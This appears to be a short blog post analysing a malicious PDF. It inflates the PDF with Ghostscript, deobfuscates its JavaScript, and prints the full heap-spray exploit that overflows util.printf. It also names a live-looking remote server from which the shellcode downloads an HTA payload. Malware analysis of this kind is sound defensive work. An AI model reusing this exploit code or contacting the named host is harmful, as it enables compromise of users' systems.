This is analysis that I have done on the malicious PDF file.
Target: doc1.pdf.1
MD5: 0f6af57c8ba2b3cdd9593223ca38e2de
SHA1: 93044e9484357e0de6c4dd618ded8beb2e43f878
One of the common technique for PDF decompression is using zlib. Not suprisingly, this sample was deflated using zlib as well:
We can easily inflate this contents using Ghostscript with pdfinflt.ps file that comes with it. We can use the command below:
>gs -- "C:\Program Files\gs\toolbin\pdfinflt.ps" doc1.pdf.1 out.pdf.1
GPL Ghostscript 8.50 (2005-12-31)
Copyright (C) 2005 artofcode LLC, Benicia, CA. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
Converting doc1.pdf.1 to out.pdf.1
Done.
You will see the similar output indicates the file has been inflated successfully. The inflated PDF contents:
The first screenshot shows the deobfuscated shellcode and the second one shows the obfuscated javascript. Obviously from the screenshot below, we know the deobfuscation can be done using "unescape" javascript method:
Using unescape function, we can easily convert the obfuscated code to readable javascript code:
var sccs = unescape(this.getField('text').value);This javascript code uses heap spray technique for exploitation. This exploit is using a slightly different method from the POC in which the author uses the loop to concatenate to a large number that will overflow the util.printf(), unlike POC it uses a prdefined large number.
var bgbl = unescape("%u0A0A"+"%u0A0A");
var slspc = 20 + sccs.length;
while(bgbl.length < slspc) bgbl += bgbl;
var fblk = bgbl.substring(0,slspc);
var blk = bgbl.substring(0,bgbl.length - slspc);
while(blk.length + slspc < 0x60000)
blk = blk + blk + fblk;
var mmy = new Array();
for(i = 0; i < 1200; i++){ mmy[i] = blk + sccs }
var nm = 12; for(i=0;i<18;i++){ nm = nm + "9"; }
for(i=0;i<276;i++){ nm = nm + "8"; }
util.printf(unescape(""+"%"+"25%34%"+"35%30%30%30%66"), nm);
this.closeDoc(true);
Shellcode2exe is used to convert the unicode shell into bytecode:
By using some debugging technique, we can find the payload where this exploits try to download an arbitrary .HTA file from the remote server http://adxdnet.net/code/srun.php
No comments:
Post a Comment